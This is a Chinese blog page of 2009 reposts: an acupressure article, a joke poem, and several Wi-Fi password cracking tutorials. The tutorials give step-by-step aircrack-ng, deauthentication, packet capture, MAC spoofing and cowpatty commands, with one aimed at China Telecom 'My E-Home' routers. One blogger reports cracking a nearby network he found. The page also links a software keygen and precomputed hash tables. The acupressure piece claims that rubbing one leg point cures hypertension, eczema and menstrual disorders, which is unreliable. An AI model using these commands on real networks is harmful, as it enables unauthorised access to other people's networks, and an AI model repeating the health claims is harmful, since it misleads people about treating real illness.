津津精品

[转]女人常揉三阴交，终身不变老!

769626132@qq.com(津津精品) — Wed, 18 Nov 2009 05:16:13 GMT

女人常揉三阴交终身不变老


　　常揉三阴交，终身不变老如果你的父母给你存了一笔几千万的财产，你却不知道用。还每天到处借钱，过得穷困潦倒，那是多么可惜的事情呀？
　　
　　爱美是女人的天性，如今日子越过越好，保养的方法也层出不穷。很多人，花了大把的时间和金钱，却眼睁睁的看衰老爬上自己的脸庞和身体。内心充满了愤怒、失望、怅惘……
　　
　　其实，三阴交穴就是我们的父母留给我们的巨额财产。可以帮助我们维持年轻，延缓衰老，推迟更年期，保证女人的魅力。三阴交穴在小腿内侧，脚踝骨的最高点往上三寸处（自己的手横着放，约四根手指横着的宽度）。三阴交对女人、对人体究竟有什么神奇作用呢？

　　
　　 1、保养子宫和卵巢人体的任脉、督脉、冲脉这三条经脉的经气都同起于胞宫（子宫和卵巢）。其中，任脉主管人体全身之血，督脉主管人体全身之气，冲脉是所有经脉的主管。每天晚上5点—7点，肾经当令之时，用力按揉每条腿的三阴交穴各15分钟左右，能保养子宫和卵巢。促进任脉、督脉、冲脉的畅通。女人只要气血畅通，就会面色红润白里透红，睡眠踏实，皮肤和肌肉不垮不松。
　　
　　 2、紧致脸部肌肉，使脸部不下垂看看张曼玉和赵雅芝，现在脸都紧紧的，没有松垮下来，因为她们的饮食都很规律，脾没有受到伤害。再看看大美人关之琳，经常在家开Part，饮食无节制，喝酒无节制，伤了脾，脸部现在松弛得非常明显，老态骤然显现。经常伤害脾，脸上及全身肌肉都会更快的松弛。如果想在40岁之后，还能对抗地球的引力，保证脸部和胸部不下垂。除了饮食要规律之外，还要经常在晚上9点左右，三焦经当令之时，按揉左右腿的三阴交穴各20分钟健脾，因为三阴交是脾经的大补穴哦。
　　
　　 3、调月经，去斑，去皱，祛痘三阴交是脾、肝、肾三条经络相交汇的穴位。其中，脾化生气血，统摄血液。肝藏血，肾精生气血。女人只要气血足，那些月经先期、月经后期、月经先后无定期、不来月经等统称为月经不调的疾病都会消失。而女人脸上长斑、痘、皱纹，其实都与月经不调有关。只要每天晚上9点—11点，三焦经当令之时，按揉两条腿的三阴交各15分钟，就能调理月经，祛斑、祛痘、去皱。不过，要坚持才有效果哦，坚持每天按揉，按揉一个月之后，才能看得到效果。如果指望一两天就看到效果，只能是做梦了。
　　
　　 4、改善性冷淡很多女性面对高压的生活节奏，或者因为自身饮食结构或生活习惯不合理，导致性冷淡。这样不但自己少了很多生活的乐趣，还影响夫妻感情，容易导致家庭不稳。三阴交是一个大补穴，能补气补血，提升女人的性欲，让女人逃离性冷淡，重温浪漫人生。每天晚上5点—7点，肾经当令之时，按揉三阴交，提升性欲的效果最好。坚持一个月，定能收到你想要的效果。

　　 5、调治肌肤过敏，湿疹，荨麻疹，皮炎三阴交是脾经的大补穴。脾最大的功能之一是能够把人体的水湿浊毒运化出去。每天中午11点，脾经当令之时，按揉左右腿的三阴交各20分钟，能把身体里面的湿气、浊气、毒素都给排出去。皮肤之所以过敏，长湿疹，荨麻疹，皮炎等毛病，都是体内的湿气、浊气、毒素在捣乱。只要按揉三阴交，把这些讨厌的调皮鬼赶出去，不出一个半月，皮肤就能恢复光洁细腻，干净无暇了。
　　
　　 6、保持血压稳定三阴交是一个智能调节穴位。当你血压过高或过低，每天中午11点—13点，心经当令之时，用力按揉两条腿的三阴交各20分钟，坚持两三个月，能把血压调理至正常值。
　　另外，三阴交还能调治脾胃虚弱，消化不良，腹胀腹泻，白带过多，子宫下垂，全身水肿，眼袋浮肿，小便不利，脚气，失眠等症。
　　
　　我有位邻居王教授，是位退休的老中医。老太太今年71岁，脸上一个老年斑都没有，脸皮紧紧的没有松弛现象，皱纹只有浅浅的几根。说话声音洪亮，中气十足。每次去爬香山，中途从不休息，都是一口气爬上去的，还不大喘气。在我的一再套近乎下，老人透露了她的保养秘诀：保持心情愉快，饮食清淡，适量运动，充足的睡眠，每天按揉三阴交，每条腿的三阴交至少按揉或用经络锤敲打10分钟以上。
　　
　　对于穴位的按揉，不要指望一两天出效果。一定要像王教授这样坚持，坚持才有效果。父母生我们时，三阴交这个大补穴已经在我们身上了，等于是父母给我们往抗衰老银行里存了一笔巨额财产。既然是父母无私的赠与，我们为什么不好好利用呢？每天坚持按揉链条腿的三阴交各15分钟以上，还惧怕岁月的侵蚀吗？如果感觉用手指按揉比较累，可以用经络锤敲打，或者用筷子头按揉，效果也一样哦。

　女人想更健康美丽往下看：
　　
　　女人病：
　　
　　 1、三阴交：在脚内踝尖上7cm左右，小腿胫骨后缘的地方。点按可活血又可止血，滋阴利湿。
　　
　　 2、经后乏力、腰酸腿疼，吃六味地黄丸。
　　
　　 3、月经淋漓不止。原因是脾不统血、气虚下陷。平日吃补中益气丸，红枣。月经期服八珍颗粒两袋和三七粉（同仁堂）一瓶。
　　
　　 4、经量少，滞涩难下，久久不来，平日以山楂煮水喝，可加红糖。
　　
　　美容篇：
　　
　　 1、用手指肚敲头2分钟、梳头2分钟。头上有膀胱经、胆经、三焦经、胃经。
　　
　　 2、用手指肚敲面部、额头、眉骨、鼻子、下巴。
　　
　　 3、敲胳膊上的大肠经（从上臂到手腕都要敲）。
　　
　　 4、刺激按揉丝竹空（靠太阳穴那端的眉尖），可防长斑，减少鱼尾纹。
　　
　　养胃篇：
　　
　　要补血先健脾胃。气血不足，大便必然无力而下。养胃的重点是排“三浊”--浊气、浊水、浊便。小屁、蔫屁、臭屁是放肠胃产生的浊气；响而不臭的屁，是肝胆的浊气。
　　
　　 1、推腹法：从心脏下部开始推，只要是从上往下推，怎么推都行。将脾胃或肝经的废气排泄，引气血重新灌注而解脾胃寒的问题。
　　
　　 2、山药、薏米（1：1的比例）打粉熬粥。健脾祛湿，增长气血。肝火旺、脾胃虚弱者都可以食。有齿痕就是脾虚。
　　
　　多吃红枣，补气血。
　　
　　吃完肉、要吃大山楂丸帮助消化。
　　
　　 3、金鸡独立：闭眼，任意抬起一只脚，用意念保持身体平衡，把气血引到脚上，一会就会满身出汗。跟热水泡脚的功效差不多。
　　
　　 4、睡眠质量不好就是肠胃的原因。先按太冲穴，补足心血，再敲胆经。排气多了，大便也色深味重了。这说明肝胆之毒素从肠道排出了。

　　
　　小贴士：
　　
　　找穴位：手摸有沙粒或者硬条一样的东西。揉法要让力量透下去。腿上的经要由上向下推，胳膊上的经要由下向上推。
　　
　　磨牙：气郁不舒或精神紧张造成。吃逍遥丸以健脾舒肝，还可吃白萝卜通通气。气顺痰自消。
　　
　　感冒：取嚏法。驱除体内的寒气，感冒自消。

[转]偷菜的后果

769626132@qq.com(津津精品) — Wed, 18 Nov 2009 05:11:49 GMT

开心农场大坏蛋
培养网上盗窃犯
不睡觉，不吃饭
睡到半夜到处串
他攀墙，我跳院
月黑风高好做案
人手一张麻袋片
这拔葱，那拽蒜
茄子土豆偷成片
谁家菜地都不管
偷完马上往家窜
一到家里傻了眼
自家蔬菜全不见

WPA终结梦魇----GPU运算之高速破解WPA-PSK加密实战

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:16:53 GMT

现在很多朋友都在学习和研究WPA的破解及WPA PMK Hash破解，关于WPA PMK Hash的创建及使用，我已经在《无线网络安全攻防实战》一书中给出详细操作实例，并且为了给大家提供一个练手的机会，ZerOne安全团队无线安全组也在广州安全交流会上无偿提供给大家高达4.3GB的WPA PMK Hash Table DVD光盘镜像下载（大家可到Anywlan论坛或者我的Blog查看下载地址），呵呵，虽然也受到了一些莫名其妙的指责。但是作为高速破解的途径来说，从一开始，就不止Hash这一种方法，这里我要讲述的就是在未来几年内将会成为主流的破解方法---GPU运算破解。

关于GPU运算用于无线安全领域，ZerOne安全团队无线安全组已经于2008年中展开自主研发，并已取得一些成果，本文为引导更多朋友了解此类技术所写的基础工具型破解教程，望同一方向的朋友能和我联系，欢迎大家的交流。
好了话不多说，单机环境下只要配合合适的显卡，速度可以飙升到1万以上，若是性能优异的显卡可达到5万甚至更高。关于此类工具的详细安装、操作、破解、问题解答、软件下载内容我已经全部整理成基础破解教程，提供给大家下载。
文中涉及软件：Elcomsoft Wireless Security Auditor（简称为EWSA）
软件版本：v1.0.0.133版
支持系统：Windows 2000/XP/2003/Vista/2008
软件下载：http://www.elcomsoft.com/ewsa.html
--------------------------------------------------------------
详细长达11页的GPU运算破解WPA-PSK实战操作教程，下载地址如下
http://www.box.net/shared/ygjeeim9ms
GPU相关软件EWSA及注册机下载地址如下
http://www.box.net/shared/h2n1mnhgqq

解密WPA/WPA2加密高速破解的真相

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:15:48 GMT

对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个 ...
　　对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个行之有效的方法。因为事实证明：绝大部分的管理员、维护人员、家庭用户的安全意识并没有他们自己认为的那么高，至少过去的一年多时间里，笔者已经遇到了无数设置为生日或者简单单词的WPA-PSK密码。
　　那么，是不是可以说，只要有足够空间、考虑周全的字典，破解WPA实际也就主要是时间的问题了。真的只是这样么?不知道大家仔细留意过没有，按照现在主流单机环境配置，在WPA破解速率上也就维持在100~~300k/s(k/s指的是破解时每秒调用的key数量)，以这样的破解速率，要把一个以小写字母和数字组合的5位WPA密码破开，我们来以基本的概率论知识估算一下：
　　(26+10)?= 60466176;
　　破解所有花费的时间将会是：
　　60466176/(3600×300)~~ 60466176/(3600×100)，即花费55.987~~167.962小时。
　　若是换算成天数的话，大概需要2~~7天。这还只是5位数WPA密码，若是采用WPA密码为纯小写字母且长度在10位数以上，则最快需要时间是5446261 天，也就是14921年!!真的是天位数字啊!!若是密码组合采用大小写字母+数字+特殊字符的话，恐怕连看到这里的你都会说：还是不用考虑破解了吧?
　　所以，前面讲述的获得到WPA握手后，进行的破解实际上只适用于是在对方采用简单密码的情况，也就是说，因为破解速率太慢，所以在对方采用稍微复杂的密码之后，这个常规方法就没有太多的实战能力甚至彻底失去破解意义。
　　若有人对概率知识稍有欠缺，或者觉得计算破解时间太麻烦的话，可以到下面这个网址上看看，这上面提供一个在线估算密码破解时间的服务，很方便。网址：http://lastbit.com/pswcalc.asp，可以看到一个明显的Password Calculator标题，即密码估算。
　　在下面的栏目中，可以输入要计算密码的可能长度、使用计算机的破解速率、被用于破解的计算机数量、密码的组合可能(大小写字母、数字、通配符或全部)，填写完毕，点击下方的Calculate(计算)，在其下方就可以给出暴力破解的估算时间了。如下图2，可以看到估算出采用小写字母和数字组成的5位数密码，在单机以30k/s的速率破解需要时间为24天!!

图密码估算服务设置内容
看到这里，也许有的读者会想到：可以升级硬件设备啊，比如CPU、内存之类。不错，升级硬件确实可以在一定程度上提升破解，但那也是很有限的，比如就目前而言，普通独立计算机下内存最大也就能升级到4G，CPU无非就是最新的高缓存四核处理器。这样的配置对于刚才我们举例的10位WPA密码，破解时间还是以年来计算的!!
那么，那些高级黑客们又是怎么做的呢?难道只是靠单纯地提升硬件么?这里我们在揭开高速破解之前，先讲述一些概念：
Tables
可以说长期进行密码学研究的人很少有不知道这个的。在很多年前，国外的黑客们就发现单纯地通过导入字典，采用和目标同等算法破解，其速度其实是非常缓慢的，就效率而言根本不能满足实战需要。之后通过大量的尝试和总结，黑客们发现如果能够实现直接建立出一个数据文件，里面事先记录了采用和目标采用同样算法计算后生成的Hash散列数值，在需要破解的时候直接调用这样的文件进行比对，破解效率就可以大幅度地，甚至成百近千近万倍地提高，这样事先构造的Hash散列数据文件在安全界被称之为Table表(文件)。
Rainbow Tables
最出名的Tables是Rainbow Tables，即安全界中常提及的彩虹表，它是以Windows的用户帐户LM/NTLM散列为破解对象的。简单说明一下，在 Windows2000/XP/2003系统下，账户密码并不是明文保存的，而是通过微软所定义的算法，保存为一种无法直接识别的文件，即通常所说的SAM文件，这个文件在系统工作时因为被调用所以不能够被直接破解。但我们可以将其以Hash即散列的方式提取，以方便导入到专业工具破解，提取出来的密码散列类似于下面：
Administrator:500:96e95ed6bad37454aad3b435b51404ee:64e2d1e9b06cb8c8b05e42f0e6605c74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1001:732b2c9a2934e481cd0a8808b19097ef:778620d5d5de064154e689fa4790129f:::
user2:1002:a042f67a99758fd727b99b2375d829f9:6127ee12a83da34fc19953e538e4d580:::
若是以传统破解方式而言，无论是本地，还是内网在线破解，效率都不是很高。据实际测试，单机环境下，破解一个14位长包含大小写字母以及数字的无规律密码，一般是需要3~~9小时的，这个时间值会随着密码的复杂度及计算机性能差异提升到几天甚至数月不等。虽然说大部分人都不会使用这样复杂的密码，但对于目前很多密码足够复杂并且长度超过10位的密码比如“Y1a9n7g9z0h7e”，还是会令黑客们头痛不已。
2003年7月瑞士洛桑联邦技术学院Philippe Oechslin公布了一些实验结果，他及其所属的安全及密码学实验室(LASEC)采用了时间内存替换的方法，使得密码破解的效率大大提高。作为一个例子，他们将一个常用操作系统的密码破解速度由1分41秒，提升到13.6秒。这一方法使用了大型查找表对加密的密码和由人输入的文本进行匹配，从而加速了解密所需要的计算。这种被称作“内存-时间平衡”的方法意味着使用大量内存的黑客能够减少破解密码所需要的时间。
于是，一些受到启发的黑客们事先制作出包含几乎所有可能密码的字典，然后再将其全部转换成NTLM Hash文件，这样，在实际破解的时候，就不需要再进行密码与Hash之间的转换，直接就可以通过文件中的Hash散列比对来破解Windows帐户密码，节省了大量的系统资源，使得效率能够大幅度提升。当然，这只是简单的表述，采用的这个方法在国际上就被称为Time-Memory Trade-Off ，即刚才所说的“内存-时间平衡”法，有的地方也会翻译成“时间—内存交替运算法”。其原理可以理解为以内存换取时间，可由下图3表示：

图著名的“内存-时间平衡”法运算原理图
具体算法方面的内容本文就不再涉及，对于想进行更高深层次探究的读者，可以仔细参考2003年的这篇详细文档《Making a Faster Crytanalytical Time-Memory Trade-Off》以及2005年的文档《Time-Memory Trade-Offs: False Alarm Detection Using Checkpoints》，在本节后面会给出链接。
正是由于Rainbow Tables的存在，使得普通电脑在5分钟内破解14位长足够复杂的Windows帐户密码成为可能。

图对Windows账户进行Rainbow Tables破解
如上图4可以看到，类似于c78j33c6hnws、yemawangluo178、38911770这样的Windows帐户密码几乎全部在180秒即3分钟内破出，最短只用了5秒，个别稍长的密码破解开也没有超过3分钟。
由于这里我们讨论的是无线安全部分，所以本文就Windows下的Tables技术不再深入举例。有兴趣的读者可以从本文后面列出的网址查看更多的相关资料。
WPA-PSK Hash Tables
现在，在理解了“内存-时间平衡”法和Table的存在意义后，让我们回到无线领域，破解WPA-PSK也是同样的意思。在2006年举行的RECON 2006安全会议上，一位来自Openciphers组织的名为David Hulton的安全人员详细演示了使用WPA-PSK Hash Tables破解的技术细节，给与会者极大的震动。
下面所示的为会议上引用的WPA加密以及主密钥对匹配等建立WPA Tables所需理念的原理图，其中，MK为密码原文，PMK就是通过PBKDF2运算所得出的数值，PTK就是在PMK的基础上进行预运算产生的WPA Hash，这个Hash将用来和WPA 握手包中的值对照，若匹配即为密码。

图针对WPA加密Tables破解的原理图
这种采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。
下图6即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。

图在Cowpatty里进行WPA Tables破解界面
我想，对于很多无线用户来说，这才是真正的噩梦。古希腊哲学家苏格拉底曾说过这么一句话： “认识你自己。” ，但实际上很多时候都是黑客背地猖獗，而很多网络及安全管理人员要么对攻击者的技术仅是略知皮毛，要么就根本一无所知，而且甚至不知道自己在经过所谓安全配置后的网络架构，将实际面临什么样的风险。
虽然说公开一些技术也许反而会引起个别心怀恶意的人注意，不过出于对无线安全理念的普及及深入理解，帮助很多已经完成或者正在进行无线网络规划的军警政机构、大中型企业及特殊部门，更清楚地认识到无线网络的风险，从而尽可能地完善自身的不足，避免不必要的损失，才是本书的出发点。
当然，要说明的是，Tables的建立并没有想象的那么容易，就建立本身而言，其效率非常低下，加上需要指定预攻击AP的SSID，想要建立一套针对所有常见接入点，并采用简单密码的WPA-PSK Hash Tables，其生成文件占据的硬盘空间最少也要1~~3G。需要深入了解WPA Table的读者，可以到这个名为The Church of Wifi的无线黑客组织了解更多内容，该组织官方站点为http://www.churchofwifi.org，该组织在过去的两年里成功建立了庞大的WPA Table库，并将其简化的WPA-PSK Hash Table版本提供免费下载，对很多无线黑客而言，这确实是个福音，但遗憾的是，即便是简化版本，其大小也已经超过了30G。
感兴趣的读者可以到http://umbra.shmoo.com:6969去下载这个简化版本的Table种子文件，该Table全部下载回来大小有33.54GB，需要说明的是，生成该Table所依据的字典虽然经过黑客组织的筛选，但是由于国情不同，所以里面部分内容可能并不适合国内情况的使用比如虽然都会有人使用姓名作为密码，在国外可能是类似于BruceLee这样的英文名称，但是到了国内就可能是Lilianjie这样的拼音了。

图 30G WPA Hash下载页面
不过，对于无线网络管理员，并不能因此松一口气，真正的噩梦才刚刚开始，因为这个方法也同样适用于破解WPA2加密。而且，国外一些地下高级黑客组织，也已经建立了高达500G的详尽WPA/WPA2攻击Table库，甚至一些基本完善的WPA-PSK Hash Tables已经在黑客网站上开始公开出售，只需要支付120美金左右，就会有8张包含WPA-PSK Hash Tables 的DVD光盘通过Fedex直接送到你的手上。

无线安全破解专用WPA-PSK Hash Table DVD下载地址汇总

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:14:21 GMT

此次由ZerOne安全团队制作的无线安全破解专用DVD光盘，其中包含的WPA 破解 Hash Table已全部经过测试可用，所含SSID均为ZerOne安全团队在对多个省会城市进行多次实地War-Driving无线探测基础上，从汇总数据中精心挑选出国内使用频率最高的前62个SSID整理而成。光盘里除了包含多达40余种8位以上生日类密码组合外，还包括了8位以上普通用户常用密码组合，总容量达4.4GB。实为无线安全密码破解测试、无线渗透测试及安全评估之必备利器。

该DVD光盘内除了主要包含的大容量WPA-PSK/WPA2-PSK 破解用 Hash Table以外，为方便大家学习及借鉴，还附赠了由ZerOne安全团队近年来进行省会城市War-Driving的官方探测汇总报告，此外，还准备了相关无线安全教程的文档及资源列表。希望借此给大家研究无线网络安全带来实质性的帮助。
哈，作为国内第一张无线安全破解专用WPA-PSK Hash Table DVD，除实用价值外，也极具收藏和纪念意义！！
由于光盘体积过大，所以HTTP下载目前暂不可用，下为目前公开的下载方式及地址汇总：
WPA-PSK/WPA2-PSK光盘BT下载
种子一：http://bigpack.blogbus.com/files/12266612070.torrent
上述种子中的DVD光盘镜像文件已压缩，从ISO压成RAR，大约减少了900M，可为所有下载的朋友节省许多时间
种子文件物征码：60a0cca09203ed9b309c95047f3333acb1661d32 分块大小: 512 KB
种子二： http://bigpack.blogbus.com/files/12266612980.torrent
---------------------------------------------------------------------------
纳米盘下载
共22个分包。该资源比较大，需纳米机器人下载。没装纳米机器人，点此安装纳米机器人
ZerOne WPA HASH.part01.rar
ZerOne WPA HASH.part02.rar
ZerOne WPA HASH.part03.rar
ZerOne WPA HASH.part04.rar
ZerOne WPA HASH.part05.rar
ZerOne WPA HASH.part06.rar
ZerOne WPA HASH.part07.rar
ZerOne WPA HASH.part08.rar
ZerOne WPA HASH.part09.rar
ZerOne WPA HASH.part10.rar
ZerOne WPA HASH.part11.rar
ZerOne WPA HASH.part12.rar
ZerOne WPA HASH.part13.rar
ZerOne WPA HASH.part14.rar
ZerOne WPA HASH.part15.rar
ZerOne WPA HASH.part16.rar
ZerOne WPA HASH.part17.rar
ZerOne WPA HASH.part18.rar
ZerOne WPA HASH.part19.rar
ZerOne WPA HASH.part20.rar
ZerOne WPA HASH.part21.rar
ZerOne WPA HASH.part22.rar

WPA / WPA2加密高速破解

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:11:51 GMT

听
最近在网上看到一篇帖子，《网上风行"无线蹭网"秘笈破解密码只需10分钟》，看完后，心里一直痒痒，迫不及待的上网搜索了起来。看来自从离开黑鹰之后，咱这"黑"心还是存在的。网上搜索了下，晕了，各种方法、秘籍，好像不要钱一样全铺在网上。仔细看了一下，全是利用Linux系统来进行破解无线网密码的，有用Ubuntu的，有用BT3。其实二者都是Linux系统，只是作者不同，打造的系统界面也不同。 wep密码相对来说比较好破，我在我们公司实验，在有数据传输的情况下几分钟就可以破解，我是在XP模式下运行虚拟机，下载的BT3，和spoonwep2,spoonwpa.
WPA无线密码破解起来比较麻烦，重点说说这个：
查看资料：
对于无线WPA加密环境，在获得了WPA握手验证包后，攻击者会通过暴力破解模式来进行WPA密码破解，同时也可以通过事先建立有针对性的字典，然后再进行字典破解(攻击)。对于大多数无线接入点AP而言，这将会是个行之有效的方法。因为事实证明：绝大部分的管理员、维护人员、家庭用户的安全意识并没有他们自己认为的那么高，至少过去的一年多时间里，笔者已经遇到了无数设置为生日或者简单单词的WPA-PSK密码。
　　那么，是不是可以说，只要有足够空间、考虑周全的字典，破解WPA实际也就主要是时间的问题了。真的只是这样么?不知道大家仔细留意过没有，按照现在主流单机环境配置，在WPA破解速率上也就维持在100~~300k/s(k/s指的是破解时每秒调用的key数量)，以这样的破解速率，要把一个以小写字母和数字组合的5位WPA密码破开，我们来以基本的概率论知识估算一下：

(26+10)?= 60466176;
该5位数WPA密码可能性为：
破解所有花费的时间将会是：
60466176/(3600×300)~~ 60466176/(3600×100)，即花费55.987~~167.962小时。
若是换算成天数的话，大概需要2~~7天。这还只是5位数WPA密码，若是采用WPA密码为纯小写字母且长度在10位数以上，则最快需要时间是5446261 天，也就是14921年!!真的是天位数字啊!!若是密码组合采用大小写字母+数字+特殊字符的话，恐怕连看到这里的你都会说：还是不用考虑破解了吧?
所以，前面讲述的获得到WPA握手后，进行的破解实际上只适用于是在对方采用简单密码的情况，也就是说，因为破解速率太慢，所以在对方采用稍微复杂的密码之后，这个常规方法就没有太多的实战能力甚至彻底失去破解意义。

重点：
采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。
　　下图6即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。

采用了类似Rainbow Tables原理，通过Pre-Compute即预运算的方式，来进行提前运算以生成WPA-PSK加密Hash，从而建立起来的WPA-PSK Hash Tables，可以如事先设想般有效地大幅度提升破解效率。一般来说，可以将以前的100~~300 key/s的普通单机破解速率，提升到30，000~~100，000 key/s，提升了近300~~1000倍!!!这才是国内外无线黑客目前使用的破解技术，就一些地下组织而言，甚至个别秉持执著、探求本质精神的黑客通过改进优化代码等方式使得破解速率突破了150，000k/s，而且还有提升空间。这个速度意味着什么，如果再换置成最新的硬件配置呢?聪明的你一定明白。
　即为在cowpatty里对获取的WPA握手包进行WPA Table破解界面，可以看到在导入Table之后，破解速率达到了6，5228 pass/second。

我对我电脑搜索到得一个wpa信号进行试验，选中其中流量最大的一台客户端进行攻击，
大概一个小时左右密码就显示出来，效率还是可以的，破解出来的秘密为8位数，
的歌发表于2009年09月26日 11:00 阅读(6) 评论(0) 分类： [url=javascript:;]个人日记 [/url][url=javascript:;]举报[/url]

破解电信我的E家无线网络

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:10:05 GMT

无线破解—中国电信“我的E家”无线wpa-psk加密
文图作者： Christopher Yang 【ZerOne】
欢迎转载，请注明作者及出处。
测试环境：Windows XP SP2
无线网卡：Intel Wireless 3945ABG 无线网卡
测试工具：Aircrack-ng for Windows套装
无线接入点类型：中国电信“我的E家”无线套餐--阿尔卡特无线路由器
作为目前中国电信正在国内普及的“我的E家”无线套餐，除了提供2M带宽的高速访问及其它优惠活动外，还提供一款家用型无线路由器。该无线路由器采用PPPOE方式上网，并支持多客户端进行有线及无线网络的连接，可以根据需要选择WEP、WPA-PSK等加密方式。具体路由器型号应地区不同稍有差异，下面就西北地区中国电信“我的E家”普遍配送的阿尔卡特无线路由器的无线加密破解进行分析。
下图为出自上海贝尔的阿尔卡特无线路由器配置页面
关于Linux下破解无线接入点wpa-psk加密的方法在论坛里已经有很多实例，具体各位可以参考置顶的主帖，所以这次我就讲述一下Windows XP环境下的破解WPA-PSK加密的步骤。
步骤1：搜索无线接入点信号，在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等，下图为使用Commview for WiFi进行无线扫描，可以看到，扫描到SSID为AR7WRD的无线接入点信号。
步骤2：将Windows版的Aircrack-ng套装解压缩到C盘下，需要说明的是，在其目录下应确保存在commview.dll、cygwin1.dll及ca2k.dll文件的存在，这些文件可以通过安装Commview for WiFi后在其安装目录中获得。在Windows下载入无线网卡，命令如下：
airserv-ng -d “commview.dll|debug”
其中：
-d 后跟网卡，在这里为笔记本上常见的内置Intel 3945ABG无线网卡，输入y确定。
注意：这里和Linux下的区别在于，Windows下并不能像载入eth0这样的方式载入无线网卡，所以airserv-ng的功能就是建立无线网卡连接服务，以便Aircrack-ng套装中其它无线黑客工具的载入。这里默认监听IP为本机，默认端口为666，可以修改。

步骤3：下面，打开airodump-ng进行无线抓包，命令如下：
airodump-ng -w x.cap 127.0.0.1：666
其中：
-w 后跟捕获的Cap数据包文件
后面的127.0.0.1：666即为本地无线网卡网络接口
步骤4：对目标进行Deauth攻击，命令如下：
aireplay-ng -0 5 –a AP’s MAC 127.0.0.1:666
其中：
-0 num 使用Deauth攻击，num为发送攻击次数
-a AP’s MAC 指明预攻击AP的MAC，这里就是通过无线嗅探获取的阿尔卡特无线路由器的MAC
当Deauth攻击成功时，即可截获到WPA-PSK握手验证数据包，如下图右上角所示，在airodump-ng上会有明确提示。
步骤5：接下来，即可将捕获的数据包导入aircrack-ng破解，命令如下：
aircrack-ng –w dict WPA-PSK’s Cap
其中：
-w 载入字典
后跟上面截获的WPA-PSK验证数据包。
在稍等片刻后，即可看到如下图所示般，破解出对方的WPA-PSK连接密码了。
继续延伸：
除了传统的字典破解，还可以使用定制的Hash进行WPA-PSK高速破解。将截获的cap文件导入到cowpatty破解，命令如下：
cowpatty –d WPA-PSK-Hash -r WPA-PSK’s Cap -s SSID
其中：
-d 导入事先制作的WPA-PSK-Hash
-r 导入事先捕获的WPA-PSK握手验证包
-s 无线接入点的SSID，这里就是AR7WRD
稍等片刻，就可以看到下图中被成功破解的WPA-PSK加密密码，破解时间只花费了0.36秒，破解速度达到了65228.41 key / s。
至此，中国电信“我的E家”的无线接入点WPA-PSK加密即已被成功破解，只需要将自己的网卡中设置为此密码即可连接至该无线路由器进行上网操作了。
至此，中国电信“我的E家”的无线接入点WPA-PSK加密即已被成功破解，只需要将自己的网卡中设置为此密码即可连接至该无线路由器进行上网操作了。

BT4破解

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:09:07 GMT

BT4破解

BT4破解无线网络详解
1.下载光盘版BT4VM版和虚拟机，制作虚拟启动BT4。VM版的BT4可能都集成网卡无用，但对USB网卡支持很好。
2.启动BT4，选console控制台模式，用户名root,密码toor<注意不是root>,再运行startx启动窗口模式。
另：BT4启动黑屏问题解决办法
输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx
我的笔记本是三星R458的，启动BT4，startx时按住空格可以进入.。
在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入
win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开
一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
---------------------end---------------------
[] 可选
<> 回显
/ 或者
() 提示
---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a

[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
(可能要加载网卡才支持注入?)
3.airmon-ng start wlan0 6

(6是频道)
另一说5100要支持注入用airmon-ng start wlan0
如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
(注入攻击成功/不成功)
(检测你的网卡是否支持注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
(pack是随便起的获取的ivs的保存文件的名字)
另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
一、有客户端：
破解:abcd四种方式
a.合法客户端产生大量有效的数据，能直接获得大量cap。
收到10000以上data后，直接转shell 3,破解密码
b.合法客户端只能产生少量数据，就需要注入<-3>攻击加速产生大量数据。
